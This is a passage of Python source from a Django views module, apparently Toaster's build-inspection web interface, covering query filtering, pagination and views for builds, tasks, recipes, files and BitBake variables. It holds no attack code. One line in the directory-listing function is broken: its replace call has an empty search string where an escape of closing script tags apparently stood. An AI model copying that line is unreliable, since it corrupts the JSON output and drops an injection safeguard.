QuerySet) or isinstance(obj, set):\n return list(obj)\n elif isinstance(obj, Decimal):\n return str(obj)\n elif type(obj).__name__ == \"RelatedManager\":\n return [x.pk 
for x in obj.all()]\n elif hasattr( obj, '__dict__') and isinstance(obj, Model):\n d = obj.__dict__\n nd = dict(d)\n for di in d.keys():\n if di.startswith(\"_\"):\n del nd[di]\n elif isinstance(d[di], Model):\n nd[di] = d[di].pk\n elif isinstance(d[di], int) and hasattr(obj, \"get_%s_display\" % di):\n nd[di] = getattr(obj, \"get_%s_display\" % di)()\n return nd\n elif isinstance( obj, type(lambda x:x)):\n import inspect\n return inspect.getsourcelines(obj)[0]\n else:\n raise TypeError(\"Unserializable object %s (%s) of type %s\" % ( obj, dir(obj), type(obj)))\n\n\ndef _lv_to_dict(prj, x = None):\n if x is None:\n def wrapper(x):\n return _lv_to_dict(prj, x)\n return wrapper\n\n return {\"id\": x.pk,\n \"name\": x.layer.name,\n \"tooltip\": \"%s | %s\" % (x.layer.vcs_url,x.get_vcs_reference()),\n \"detail\": \"(%s\" % x.layer.vcs_url + (\")\" if x.release is None else \" | \"+x.get_vcs_reference()+\")\"),\n \"giturl\": x.layer.vcs_url,\n \"layerdetailurl\" : reverse('layerdetails', args=(prj.id,x.pk)),\n \"revision\" : x.get_vcs_reference(),\n }\n\n\ndef _build_page_range(paginator, index = 1):\n try:\n page = paginator.page(index)\n except PageNotAnInteger:\n page = paginator.page(1)\n except EmptyPage:\n page = paginator.page(paginator.num_pages)\n\n\n page.page_range = [page.number]\n crt_range = 0\n for i in range(1,5):\n if (page.number + i) <= paginator.num_pages:\n page.page_range = page.page_range + [ page.number + i]\n crt_range +=1\n if (page.number - i) > 0:\n page.page_range = [page.number -i] + page.page_range\n crt_range +=1\n if crt_range == 4:\n break\n return page\n\n\ndef _verify_parameters(g, mandatory_parameters):\n miss = []\n for mp in mandatory_parameters:\n if not mp in g:\n miss.append(mp)\n if len(miss):\n return miss\n return None\n\ndef _redirect_parameters(view, g, mandatory_parameters, *args, **kwargs):\n try:\n from urllib import unquote, urlencode\n except ImportError:\n from urllib.parse import unquote, urlencode\n url = reverse(view, kwargs=kwargs)\n params = {}\n for i in g:\n params[i] = g[i]\n for i in mandatory_parameters:\n if not i in params:\n params[i] = unquote(str(mandatory_parameters[i]))\n\n return redirect(url + \"?%s\" % urlencode(params), permanent = False, **kwargs)\n\nclass RedirectException(Exception):\n def __init__(self, view, g, mandatory_parameters, *args, **kwargs):\n super(RedirectException, self).__init__()\n self.view = view\n self.g = g\n self.mandatory_parameters = mandatory_parameters\n self.oargs = args\n self.okwargs = kwargs\n\n def get_redirect_response(self):\n return _redirect_parameters(self.view, self.g, self.mandatory_parameters, self.oargs, **self.okwargs)\n\nFIELD_SEPARATOR = \":\"\nAND_VALUE_SEPARATOR = \"!\"\nOR_VALUE_SEPARATOR = \"|\"\nDESCENDING = \"-\"\n\ndef __get_q_for_val(name, value):\n if \"OR\" in value or \"AND\" in value:\n result = None\n for x in value.split(\"OR\"):\n x = __get_q_for_val(name, x)\n result = result | x if result else x\n return result\n if \"AND\" in value:\n result = None\n for x in value.split(\"AND\"):\n x = __get_q_for_val(name, x)\n result = result & x if result else x\n return result\n if value.startswith(\"NOT\"):\n value = value[3:]\n if value == 'None':\n value = None\n kwargs = { name : value }\n return ~Q(**kwargs)\n else:\n if value == 'None':\n value = None\n kwargs = { name : value }\n return Q(**kwargs)\n\ndef _get_filtering_query(filter_string):\n\n search_terms = filter_string.split(FIELD_SEPARATOR)\n and_keys = search_terms[0].split(AND_VALUE_SEPARATOR)\n and_values 
= search_terms[1].split(AND_VALUE_SEPARATOR)\n\n and_query = None\n for kv in zip(and_keys, and_values):\n or_keys = kv[0].split(OR_VALUE_SEPARATOR)\n or_values = kv[1].split(OR_VALUE_SEPARATOR)\n query = None\n for key, val in zip(or_keys, or_values):\n x = __get_q_for_val(key, val)\n query = query | x if query else x\n\n and_query = and_query & query if and_query else query\n\n return and_query\n\ndef _get_toggle_order(request, orderkey, toggle_reverse = False):\n if toggle_reverse:\n return \"%s:+\" % orderkey if request.GET.get('orderby', \"\") == \"%s:-\" % orderkey else \"%s:-\" % orderkey\n else:\n return \"%s:-\" % orderkey if request.GET.get('orderby', \"\") == \"%s:+\" % orderkey else \"%s:+\" % orderkey\n\ndef _get_toggle_order_icon(request, orderkey):\n if request.GET.get('orderby', \"\") == \"%s:+\"%orderkey:\n return \"down\"\n elif request.GET.get('orderby', \"\") == \"%s:-\"%orderkey:\n return \"up\"\n else:\n return None\n\n# we check that the input comes in a valid form that we can recognize\ndef _validate_input(field_input, model):\n\n invalid = None\n\n if field_input:\n field_input_list = field_input.split(FIELD_SEPARATOR)\n\n # Check we have only one colon\n if len(field_input_list) != 2:\n invalid = \"We have an invalid number of separators: \" + field_input + \" -> \" + str(field_input_list)\n return None, invalid\n\n # Check we have an equal number of terms both sides of the colon\n if len(field_input_list[0].split(AND_VALUE_SEPARATOR)) != len(field_input_list[1].split(AND_VALUE_SEPARATOR)):\n invalid = \"Not all arg names got values\"\n return None, invalid + str(field_input_list)\n\n # Check we are looking for a valid field\n valid_fields = [f.name for f in model._meta.get_fields()]\n for field in field_input_list[0].split(AND_VALUE_SEPARATOR):\n if True in [field.startswith(x) for x in valid_fields]:\n break\n else:\n return None, (field, valid_fields)\n\n return field_input, invalid\n\n# uses search_allowed_fields in orm/models.py to create a search query\n# for these fields with the supplied input text\ndef _get_search_results(search_term, queryset, model):\n search_object = None\n for st in search_term.split(\" \"):\n queries = None\n for field in model.search_allowed_fields:\n query = Q(**{field + '__icontains': st})\n queries = queries | query if queries else query\n\n search_object = search_object & queries if search_object else queries\n queryset = queryset.filter(search_object)\n\n return queryset\n\n\n# function to extract the search/filter/ordering parameters from the request\n# it uses the request and the model to validate input for the filter and orderby values\ndef _search_tuple(request, model):\n ordering_string, invalid = _validate_input(request.GET.get('orderby', ''), model)\n if invalid:\n raise BaseException(\"Invalid ordering model:\" + str(model) + str(invalid))\n\n filter_string, invalid = _validate_input(request.GET.get('filter', ''), model)\n if invalid:\n raise BaseException(\"Invalid filter \" + str(invalid))\n\n search_term = request.GET.get('search', '')\n return (filter_string, search_term, ordering_string)\n\n\n# returns a lazy-evaluated queryset for a filter/search/order combination\ndef _get_queryset(model, queryset, filter_string, search_term, ordering_string, ordering_secondary=''):\n if filter_string:\n filter_query = _get_filtering_query(filter_string)\n queryset = queryset.filter(filter_query)\n else:\n queryset = queryset.all()\n\n if search_term:\n queryset = _get_search_results(search_term, queryset, model)\n\n if 
ordering_string:\n column, order = ordering_string.split(':')\n if column == re.sub('-','',ordering_secondary):\n ordering_secondary=''\n if order.lower() == DESCENDING:\n column = '-' + column\n if ordering_secondary:\n queryset = queryset.order_by(column, ordering_secondary)\n else:\n queryset = queryset.order_by(column)\n\n # insure only distinct records (e.g. from multiple search hits) are returned\n return queryset.distinct()\n\n# returns the value of entries per page and the name of the applied sorting field.\n# if the value is given explicitly as a GET parameter it will be the first selected,\n# otherwise the cookie value will be used.\ndef _get_parameters_values(request, default_count, default_order):\n current_url = resolve(request.path_info).url_name\n pagesize = request.GET.get('count', request.session.get('%s_count' % current_url, default_count))\n orderby = request.GET.get('orderby', request.session.get('%s_orderby' % current_url, default_order))\n return (pagesize, orderby)\n\n\n# set cookies for parameters. this is usefull in case parameters are set\n# manually from the GET values of the link\ndef _set_parameters_values(pagesize, orderby, request):\n from django.urls import resolve\n current_url = resolve(request.path_info).url_name\n request.session['%s_count' % current_url] = pagesize\n request.session['%s_orderby' % current_url] =orderby\n\n# date range: normalize GUI's dd/mm/yyyy to date object\ndef _normalize_input_date(date_str,default):\n date_str=re.sub('/', '-', date_str)\n # accept dd/mm/yyyy to d/m/yy\n try:\n date_in = datetime.strptime(date_str, \"%d-%m-%Y\")\n except ValueError:\n # courtesy try with two digit year\n try:\n date_in = datetime.strptime(date_str, \"%d-%m-%y\")\n except ValueError:\n return default\n date_in = date_in.replace(tzinfo=default.tzinfo)\n return date_in\n\n# convert and normalize any received date range filter, for example:\n# \"completed_on__gte!completed_on__lt:01/03/2015!02/03/2015_daterange\" to\n# \"completed_on__gte!completed_on__lt:2015-03-01!2015-03-02\"\ndef _modify_date_range_filter(filter_string):\n # was the date range radio button selected?\n if 0 > filter_string.find('_daterange'):\n return filter_string,''\n # normalize GUI dates to database format\n filter_string = filter_string.replace('_daterange','').replace(':','!');\n filter_list = filter_string.split('!');\n if 4 != len(filter_list):\n return filter_string\n today = timezone.localtime(timezone.now())\n date_id = filter_list[1]\n date_from = _normalize_input_date(filter_list[2],today)\n date_to = _normalize_input_date(filter_list[3],today)\n # swap dates if manually set dates are out of order\n if date_to < date_from:\n date_to,date_from = date_from,date_to\n # convert to strings, make 'date_to' inclusive by moving to begining of next day\n date_from_str = date_from.strftime(\"%Y-%m-%d\")\n date_to_str = (date_to+timedelta(days=1)).strftime(\"%Y-%m-%d\")\n filter_string=filter_list[0]+'!'+filter_list[1]+':'+date_from_str+'!'+date_to_str\n daterange_selected = re.sub('__.*','', date_id)\n return filter_string,daterange_selected\n\ndef _add_daterange_context(queryset_all, request, daterange_list):\n # calculate the exact begining of local today and yesterday\n today_begin = timezone.localtime(timezone.now())\n yesterday_begin = today_begin - timedelta(days=1)\n # add daterange persistent\n context_date = {}\n context_date['last_date_from'] = request.GET.get('last_date_from',timezone.localtime(timezone.now()).strftime(\"%d/%m/%Y\"))\n context_date['last_date_to' ] = 
request.GET.get('last_date_to' ,context_date['last_date_from'])\n # calculate the date ranges, avoid second sort for 'created'\n # fetch the respective max range from the database\n context_date['daterange_filter']=''\n for key in daterange_list:\n queryset_key = queryset_all.order_by(key)\n try:\n context_date['dateMin_'+key]=timezone.localtime(getattr(queryset_key.first(),key)).strftime(\"%d/%m/%Y\")\n except AttributeError:\n context_date['dateMin_'+key]=timezone.localtime(timezone.now())\n try:\n context_date['dateMax_'+key]=timezone.localtime(getattr(queryset_key.last(),key)).strftime(\"%d/%m/%Y\")\n except AttributeError:\n context_date['dateMax_'+key]=timezone.localtime(timezone.now())\n return context_date,today_begin,yesterday_begin\n\n\n##\n# build dashboard for a single build, coming in as argument\n# Each build may contain multiple targets and each target\n# may generate multiple image files. display them all.\n#\ndef builddashboard( request, build_id ):\n template = \"builddashboard.html\"\n if Build.objects.filter( pk=build_id ).count( ) == 0 :\n return redirect( builds )\n build = Build.objects.get( pk = build_id );\n layerVersionId = Layer_Version.objects.filter( build = build_id );\n recipeCount = Recipe.objects.filter( layer_version__id__in = layerVersionId ).count( );\n tgts = Target.objects.filter( build_id = build_id ).order_by( 'target' );\n\n # set up custom target list with computed package and image data\n targets = []\n ntargets = 0\n\n # True if at least one target for this build has an SDK artifact\n # or image file\n has_artifacts = False\n\n for t in tgts:\n elem = {}\n elem['target'] = t\n\n target_has_images = False\n image_files = []\n\n npkg = 0\n pkgsz = 0\n package = None\n # Chunk the query to avoid \"too many SQL variables\" error\n package_set = t.target_installed_package_set.all()\n package_set_len = len(package_set)\n for ps_start in range(0,package_set_len,500):\n ps_stop = min(ps_start+500,package_set_len)\n for package in Package.objects.filter(id__in = [x.package_id for x in package_set[ps_start:ps_stop]]):\n pkgsz = pkgsz + package.size\n if package.installed_name:\n npkg = npkg + 1\n elem['npkg'] = npkg\n elem['pkgsz'] = pkgsz\n ti = Target_Image_File.objects.filter(target_id = t.id)\n for i in ti:\n ndx = i.file_name.rfind('/')\n if ndx < 0:\n ndx = 0;\n f = i.file_name[ndx + 1:]\n image_files.append({\n 'id': i.id,\n 'path': f,\n 'size': i.file_size,\n 'suffix': i.suffix\n })\n if len(image_files) > 0:\n target_has_images = True\n elem['targetHasImages'] = target_has_images\n\n elem['imageFiles'] = image_files\n elem['target_kernel_artifacts'] = t.targetkernelfile_set.all()\n\n target_sdk_files = t.targetsdkfile_set.all()\n target_sdk_artifacts_count = target_sdk_files.count()\n elem['target_sdk_artifacts_count'] = target_sdk_artifacts_count\n elem['target_sdk_artifacts'] = target_sdk_files\n\n if target_has_images or target_sdk_artifacts_count > 0:\n has_artifacts = True\n\n targets.append(elem)\n\n ##\n # how many packages in this build - ignore anonymous ones\n #\n\n packageCount = 0\n packages = Package.objects.filter( build_id = build_id )\n for p in packages:\n if ( p.installed_name ):\n packageCount = packageCount + 1\n\n logmessages = list(LogMessage.objects.filter( build = build_id ))\n\n context = {\n 'build' : build,\n 'project' : build.project,\n 'hasArtifacts' : has_artifacts,\n 'ntargets' : ntargets,\n 'targets' : targets,\n 'recipecount' : recipeCount,\n 'packagecount' : packageCount,\n 'logmessages' : logmessages,\n }\n 
return toaster_render( request, template, context )\n\n\n\ndef generateCoveredList2( revlist = None ):\n if not revlist:\n revlist = []\n covered_list = [ x for x in revlist if x.outcome == Task.OUTCOME_COVERED ]\n while len(covered_list):\n revlist = [ x for x in revlist if x.outcome != Task.OUTCOME_COVERED ]\n if len(revlist) > 0:\n return revlist\n\n newlist = _find_task_revdep_list(covered_list)\n\n revlist = list(set(revlist + newlist))\n covered_list = [ x for x in revlist if x.outcome == Task.OUTCOME_COVERED ]\n return revlist\n\ndef task( request, build_id, task_id ):\n template = \"task.html\"\n tasks_list = Task.objects.filter( pk=task_id )\n if tasks_list.count( ) == 0:\n return redirect( builds )\n task_object = tasks_list[ 0 ];\n dependencies = sorted(\n _find_task_dep( task_object ),\n key=lambda t:'%s_%s %s'%(t.recipe.name, t.recipe.version, t.task_name))\n reverse_dependencies = sorted(\n _find_task_revdep( task_object ),\n key=lambda t:'%s_%s %s'%( t.recipe.name, t.recipe.version, t.task_name ))\n coveredBy = '';\n if ( task_object.outcome == Task.OUTCOME_COVERED ):\n# _list = generateCoveredList( task )\n coveredBy = sorted(generateCoveredList2( _find_task_revdep( task_object ) ), key = lambda x: x.recipe.name)\n log_head = ''\n log_body = ''\n if task_object.outcome == task_object.OUTCOME_FAILED:\n pass\n\n uri_list= [ ]\n variables = Variable.objects.filter(build=build_id)\n v=variables.filter(variable_name='SSTATE_DIR')\n if v.count() > 0:\n uri_list.append(v[0].variable_value)\n v=variables.filter(variable_name='SSTATE_MIRRORS')\n if (v.count() > 0):\n for mirror in v[0].variable_value.split('\\\\n'):\n s=re.sub('.* ','',mirror.strip(' \\t\\n\\r'))\n if len(s):\n uri_list.append(s)\n\n context = {\n 'build' : Build.objects.filter( pk = build_id )[ 0 ],\n 'object' : task_object,\n 'task' : task_object,\n 'covered_by' : coveredBy,\n 'deps' : dependencies,\n 'rdeps' : reverse_dependencies,\n 'log_head' : log_head,\n 'log_body' : log_body,\n 'showing_matches' : False,\n 'uri_list' : uri_list,\n 'task_in_tasks_table_pg': int(task_object.order / 25) + 1\n }\n if request.GET.get( 'show_matches', \"\" ):\n context[ 'showing_matches' ] = True\n context[ 'matching_tasks' ] = Task.objects.filter(\n sstate_checksum=task_object.sstate_checksum ).filter(\n build__completed_on__lt=task_object.build.completed_on).exclude(\n order__isnull=True).exclude(outcome=Task.OUTCOME_NA).order_by('-build__completed_on')\n\n return toaster_render( request, template, context )\n\ndef recipe(request, build_id, recipe_id, active_tab=\"1\"):\n template = \"recipe.html\"\n if Recipe.objects.filter(pk=recipe_id).count() == 0 :\n return redirect(builds)\n\n recipe_object = Recipe.objects.get(pk=recipe_id)\n layer_version = Layer_Version.objects.get(pk=recipe_object.layer_version_id)\n layer = Layer.objects.get(pk=layer_version.layer_id)\n tasks_list = Task.objects.filter(recipe_id = recipe_id, build_id = build_id).exclude(order__isnull=True).exclude(task_name__endswith='_setscene').exclude(outcome=Task.OUTCOME_NA)\n package_count = Package.objects.filter(recipe_id = recipe_id).filter(build_id = build_id).filter(size__gte=0).count()\n\n if active_tab != '1' and active_tab != '3' and active_tab != '4' :\n active_tab = '1'\n tab_states = {'1': '', '3': '', '4': ''}\n tab_states[active_tab] = 'active'\n\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'object' : recipe_object,\n 'layer_version' : layer_version,\n 'layer' : layer,\n 'tasks' : tasks_list,\n 'package_count' : package_count,\n 
'tab_states' : tab_states,\n }\n return toaster_render(request, template, context)\n\ndef recipe_packages(request, build_id, recipe_id):\n template = \"recipe_packages.html\"\n if Recipe.objects.filter(pk=recipe_id).count() == 0 :\n return redirect(builds)\n\n (pagesize, orderby) = _get_parameters_values(request, 10, 'name:+')\n mandatory_parameters = { 'count': pagesize, 'page' : 1, 'orderby': orderby }\n retval = _verify_parameters( request.GET, mandatory_parameters )\n if retval:\n return _redirect_parameters( 'recipe_packages', request.GET, mandatory_parameters, build_id = build_id, recipe_id = recipe_id)\n (filter_string, search_term, ordering_string) = _search_tuple(request, Package)\n\n recipe_object = Recipe.objects.get(pk=recipe_id)\n queryset = Package.objects.filter(recipe_id = recipe_id).filter(build_id = build_id).filter(size__gte=0)\n package_count = queryset.count()\n queryset = _get_queryset(Package, queryset, filter_string, search_term, ordering_string, 'name')\n\n packages = _build_page_range(Paginator(queryset, pagesize),request.GET.get('page', 1))\n\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'recipe' : recipe_object,\n 'objects' : packages,\n 'object_count' : package_count,\n 'tablecols':[\n {\n 'name':'Package',\n 'orderfield': _get_toggle_order(request,\"name\"),\n 'ordericon': _get_toggle_order_icon(request,\"name\"),\n 'orderkey': \"name\",\n },\n {\n 'name':'Version',\n },\n {\n 'name':'Size',\n 'orderfield': _get_toggle_order(request,\"size\", True),\n 'ordericon': _get_toggle_order_icon(request,\"size\"),\n 'orderkey': 'size',\n 'dclass': 'sizecol span2',\n },\n ]\n }\n response = toaster_render(request, template, context)\n _set_parameters_values(pagesize, orderby, request)\n return response\n\nfrom django.http import HttpResponse\n@log_view_mixin\ndef xhr_dirinfo(request, build_id, target_id):\n top = request.GET.get('start', '/')\n return HttpResponse(_get_dir_entries(build_id, target_id, top), content_type = \"application/json\")\n\nfrom django.utils.functional import Promise\nfrom django.utils.encoding import force_str\nclass LazyEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, Promise):\n return force_str(obj)\n return super(LazyEncoder, self).default(obj)\n\nfrom toastergui.templatetags.projecttags import filtered_filesizeformat\nimport os\ndef _get_dir_entries(build_id, target_id, start):\n node_str = {\n Target_File.ITYPE_REGULAR : '-',\n Target_File.ITYPE_DIRECTORY : 'd',\n Target_File.ITYPE_SYMLINK : 'l',\n Target_File.ITYPE_SOCKET : 's',\n Target_File.ITYPE_FIFO : 'p',\n Target_File.ITYPE_CHARACTER : 'c',\n Target_File.ITYPE_BLOCK : 'b',\n }\n response = []\n objects = Target_File.objects.filter(target__exact=target_id, directory__path=start)\n target_packages = Target_Installed_Package.objects.filter(target__exact=target_id).values_list('package_id', flat=True)\n for o in objects:\n # exclude root inode '/'\n if o.path == '/':\n continue\n try:\n entry = {}\n entry['parent'] = start\n entry['name'] = os.path.basename(o.path)\n entry['fullpath'] = o.path\n\n # set defaults, not all dentries have packages\n entry['installed_package'] = None\n entry['package_id'] = None\n entry['package'] = None\n entry['link_to'] = None\n if o.inodetype == Target_File.ITYPE_DIRECTORY:\n entry['isdir'] = 1\n # is there content in directory\n entry['childcount'] = Target_File.objects.filter(target__exact=target_id, directory__path=o.path).all().count()\n else:\n entry['isdir'] = 0\n\n # resolve the file to get the package from 
the resolved file\n resolved_id = o.sym_target_id\n resolved_path = o.path\n if target_packages.count():\n while resolved_id != \"\" and resolved_id is not None:\n tf = Target_File.objects.get(pk=resolved_id)\n resolved_path = tf.path\n resolved_id = tf.sym_target_id\n\n thisfile=Package_File.objects.all().filter(path__exact=resolved_path, package_id__in=target_packages)\n if thisfile.count():\n p = Package.objects.get(pk=thisfile[0].package_id)\n entry['installed_package'] = p.installed_name\n entry['package_id'] = str(p.id)\n entry['package'] = p.name\n # don't use resolved path from above, show immediate link-to\n if o.sym_target_id != \"\" and o.sym_target_id is not None:\n entry['link_to'] = Target_File.objects.get(pk=o.sym_target_id).path\n entry['size'] = filtered_filesizeformat(o.size)\n if entry['link_to'] is not None:\n entry['permission'] = node_str[o.inodetype] + o.permission\n else:\n entry['permission'] = node_str[o.inodetype] + o.permission\n entry['owner'] = o.owner\n entry['group'] = o.group\n response.append(entry)\n\n except Exception as e:\n print(\"Exception \", e)\n traceback.print_exc()\n\n # sort by directories first, then by name\n rsorted = sorted(response, key=lambda entry : entry['name'])\n rsorted = sorted(rsorted, key=lambda entry : entry['isdir'], reverse=True)\n return json.dumps(rsorted, cls=LazyEncoder).replace('', '<\\\\/')\n\ndef dirinfo(request, build_id, target_id, file_path=None):\n template = \"dirinfo.html\"\n objects = _get_dir_entries(build_id, target_id, '/')\n packages_sum = Package.objects.filter(id__in=Target_Installed_Package.objects.filter(target_id=target_id).values('package_id')).aggregate(Sum('installed_size'))\n dir_list = None\n if file_path is not None:\n \"\"\"\n Link from the included package detail file list page and is\n requesting opening the dir info to a specific file path.\n Provide the list of directories to expand and the full path to\n highlight in the page.\n \"\"\"\n # Aassume target's path separator matches host's, that is, os.sep\n sep = os.sep\n dir_list = []\n head = file_path\n while head != sep:\n (head, tail) = os.path.split(head)\n if head != sep:\n dir_list.insert(0, head)\n\n build = Build.objects.get(pk=build_id)\n\n context = { 'build': build,\n 'project': build.project,\n 'target': Target.objects.get(pk=target_id),\n 'packages_sum': packages_sum['installed_size__sum'],\n 'objects': objects,\n 'dir_list': dir_list,\n 'file_path': file_path,\n }\n return toaster_render(request, template, context)\n\ndef _find_task_dep(task_object):\n tdeps = Task_Dependency.objects.filter(task=task_object).filter(depends_on__order__gt=0)\n tdeps = tdeps.exclude(depends_on__outcome=Task.OUTCOME_NA).select_related(\"depends_on\")\n return [x.depends_on for x in tdeps]\n\ndef _find_task_revdep(task_object):\n tdeps = Task_Dependency.objects.filter(depends_on=task_object).filter(task__order__gt=0)\n tdeps = tdeps.exclude(task__outcome = Task.OUTCOME_NA).select_related(\"task\", \"task__recipe\", \"task__build\")\n\n # exclude self-dependencies to prevent infinite dependency loop\n # in generateCoveredList2()\n tdeps = tdeps.exclude(task=task_object)\n\n return [tdep.task for tdep in tdeps]\n\ndef _find_task_revdep_list(tasklist):\n tdeps = Task_Dependency.objects.filter(depends_on__in=tasklist).filter(task__order__gt=0)\n tdeps = tdeps.exclude(task__outcome=Task.OUTCOME_NA).select_related(\"task\", \"task__recipe\", \"task__build\")\n\n # exclude self-dependencies to prevent infinite dependency loop\n # in generateCoveredList2()\n 
tdeps = tdeps.exclude(task=F('depends_on'))\n\n return [tdep.task for tdep in tdeps]\n\ndef _find_task_provider(task_object):\n task_revdeps = _find_task_revdep(task_object)\n for tr in task_revdeps:\n if tr.outcome != Task.OUTCOME_COVERED:\n return tr\n for tr in task_revdeps:\n trc = _find_task_provider(tr)\n if trc is not None:\n return trc\n return None\n\ndef configuration(request, build_id):\n template = 'configuration.html'\n\n var_names = ('BB_VERSION', 'BUILD_SYS', 'NATIVELSBSTRING', 'TARGET_SYS',\n 'MACHINE', 'DISTRO', 'DISTRO_VERSION', 'TUNE_FEATURES', 'TARGET_FPU')\n context = dict(Variable.objects.filter(build=build_id, variable_name__in=var_names)\\\n .values_list('variable_name', 'variable_value'))\n build = Build.objects.get(pk=build_id)\n context.update({'objectname': 'configuration',\n 'object_search_display':'variables',\n 'filter_search_display':'variables',\n 'build': build,\n 'project': build.project,\n 'targets': Target.objects.filter(build=build_id)})\n return toaster_render(request, template, context)\n\n\ndef configvars(request, build_id):\n template = 'configvars.html'\n (pagesize, orderby) = _get_parameters_values(request, 100, 'variable_name:+')\n mandatory_parameters = { 'count': pagesize, 'page' : 1, 'orderby' : orderby, 'filter' : 'description__regex:.+' }\n retval = _verify_parameters( request.GET, mandatory_parameters )\n (filter_string, search_term, ordering_string) = _search_tuple(request, Variable)\n if retval:\n # if new search, clear the default filter\n if search_term and len(search_term):\n mandatory_parameters['filter']=''\n return _redirect_parameters( 'configvars', request.GET, mandatory_parameters, build_id = build_id)\n\n queryset = Variable.objects.filter(build=build_id).exclude(variable_name__istartswith='B_').exclude(variable_name__istartswith='do_')\n queryset_with_search = _get_queryset(Variable, queryset, None, search_term, ordering_string, 'variable_name').exclude(variable_value='',vhistory__file_name__isnull=True)\n queryset = _get_queryset(Variable, queryset, filter_string, search_term, ordering_string, 'variable_name')\n # remove records where the value is empty AND there are no history files\n queryset = queryset.exclude(variable_value='',vhistory__file_name__isnull=True)\n\n variables = _build_page_range(Paginator(queryset, pagesize), request.GET.get('page', 1))\n\n # show all matching files (not just the last one)\n file_filter= search_term + \":\"\n if filter_string.find('/conf/') > 0:\n file_filter += 'conf/(local|bblayers).conf'\n if filter_string.find('conf/machine/') > 0:\n file_filter += 'conf/machine/'\n if filter_string.find('conf/distro/') > 0:\n file_filter += 'conf/distro/'\n if filter_string.find('/bitbake.conf') > 0:\n file_filter += '/bitbake.conf'\n build_dir=re.sub(\"/tmp/log/.*\",\"\",Build.objects.get(pk=build_id).cooker_log_path)\n\n build = Build.objects.get(pk=build_id)\n\n context = {\n 'objectname': 'configvars',\n 'object_search_display':'BitBake variables',\n 'filter_search_display':'variables',\n 'file_filter': file_filter,\n 'build': build,\n 'project': build.project,\n 'objects' : variables,\n 'total_count':queryset_with_search.count(),\n 'default_orderby' : 'variable_name:+',\n 'search_term':search_term,\n # Specifies the display of columns for the table, appearance in \"Edit columns\" box, toggling default show/hide, and specifying filters for columns\n 'tablecols' : [\n {'name': 'Variable',\n 'qhelp': \"BitBake is a generic task executor that considers a list of tasks with dependencies and handles 
metadata that consists of variables in a certain format that get passed to the tasks\",\n 'orderfield': _get_toggle_order(request, \"variable_name\"),\n 'ordericon':_get_toggle_order_icon(request, \"variable_name\"),\n },\n {'name': 'Value',\n 'qhelp': \"The value assigned to the variable\",\n },\n {'name': 'Set in file',\n 'qhelp': \"The last configuration file that touched the variable value\",\n 'clclass': 'file', 'hidden' : 0,\n 'orderkey' : 'vhistory__file_name',\n 'filter' : {\n 'class' : 'vhistory__file_name',\n 'label': 'Show:',\n 'options' : [\n ('Local configuration variables', 'vhistory__file_name__contains:'+build_dir+'/conf/',queryset_with_search.filter(vhistory__file_name__contains=build_dir+'/conf/').count(), 'Select this filter to see variables set by the local.conf and bblayers.conf configuration files inside the /build/conf/ directory'),\n ('Machine configuration variables', 'vhistory__file_name__contains:conf/machine/',queryset_with_search.filter(vhistory__file_name__contains='conf/machine').count(), 'Select this filter to see variables set by the configuration file(s) inside your layers /conf/machine/ directory'),\n ('Distro configuration variables', 'vhistory__file_name__contains:conf/distro/',queryset_with_search.filter(vhistory__file_name__contains='conf/distro').count(), 'Select this filter to see variables set by the configuration file(s) inside your layers /conf/distro/ directory'),\n ('Layer configuration variables', 'vhistory__file_name__contains:conf/layer.conf',queryset_with_search.filter(vhistory__file_name__contains='conf/layer.conf').count(), 'Select this filter to see variables set by the layer.conf configuration file inside your layers'),\n ('bitbake.conf variables', 'vhistory__file_name__contains:/bitbake.conf',queryset_with_search.filter(vhistory__file_name__contains='/bitbake.conf').count(), 'Select this filter to see variables set by the bitbake.conf configuration file'),\n ]\n },\n },\n {'name': 'Description',\n 'qhelp': \"A brief explanation of the variable\",\n 'clclass': 'description', 'hidden' : 0,\n 'dclass': \"span4\",\n 'filter' : {\n 'class' : 'description',\n 'label': 'Show:',\n 'options' : [\n ('Variables with description', 'description__regex:.+', queryset_with_search.filter(description__regex='.+').count(), 'We provide descriptions for the most common BitBake variables. The list of descriptions lives in meta/conf/documentation.conf'),\n ]\n },\n },\n ],\n }\n\n response = toaster_render(request, template, context)\n _set_parameters_values(pagesize, orderby, request)\n return response\n\ndef bfile(request, build_id, package_id):\n template = 'bfile.html'\n files = Package_File.objects.filter(package = package_id)\n build = Build.objects.get(pk=build_id)\n context = {\n 'build': build,\n 'project': build.project,\n 'objects' : files\n }\n return toaster_render(request, template, context)\n\n\n# A set of dependency types valid for both included and built package views\nOTHER_DEPENDS_BASE = [\n Package_Dependency.TYPE_RSUGGESTS,\n Package_Dependency.TYPE_RPROVIDES,\n Package_Dependency.TYPE_RREPLACES,\n Package_Dependency.TYPE_RCONFLICTS,\n ]\n\n# value for invalid row id\nINVALID_KEY = -1\n\n\"\"\"\nGiven a package id, target_id retrieves two sets of this image and package's\ndependencies. 
The return value is a dictionary consisting of two other\nlists: a list of 'runtime' dependencies, that is, having RDEPENDS\nvalues in source package's recipe, and a list of other dependencies, that is\nthe list of possible recipe variables as found in OTHER_DEPENDS_BASE plus\nthe RRECOMMENDS or TRECOMMENDS value.\nThe lists are built in the sort order specified for the package runtime\ndependency views.\n\"\"\"\ndef _get_package_dependencies(package_id, target_id = INVALID_KEY):\n runtime_deps = []\n other_deps = []\n other_depends_types = OTHER_DEPENDS_BASE\n\n if target_id != INVALID_KEY :\n rdepends_type = Package_Dependency.TYPE_TRDEPENDS\n other_depends_types += [Package_Dependency.TYPE_TRECOMMENDS]\n else :\n rdepends_type = Package_Dependency.TYPE_RDEPENDS\n other_depends_types += [Package_Dependency.TYPE_RRECOMMENDS]\n\n package = Package.objects.get(pk=package_id)\n if target_id != INVALID_KEY :\n alldeps = package.package_dependencies_source.filter(target_id__exact = target_id)\n else :\n alldeps = package.package_dependencies_source.all()\n for idep in alldeps:\n dep_package = Package.objects.get(pk=idep.depends_on_id)\n dep_entry = Package_Dependency.DEPENDS_DICT[idep.dep_type]\n if dep_package.version == '' :\n version = ''\n else :\n version = dep_package.version + \"-\" + dep_package.revision\n installed = False\n if target_id != INVALID_KEY :\n if Target_Installed_Package.objects.filter(target_id__exact = target_id, package_id__exact = dep_package.id).count() > 0:\n installed = True\n dep = {\n 'name' : dep_package.name,\n 'version' : version,\n 'size' : dep_package.size,\n 'dep_type' : idep.dep_type,\n 'dep_type_display' : dep_entry[0].capitalize(),\n 'dep_type_help' : dep_entry[1] % (dep_package.name, package.name),\n 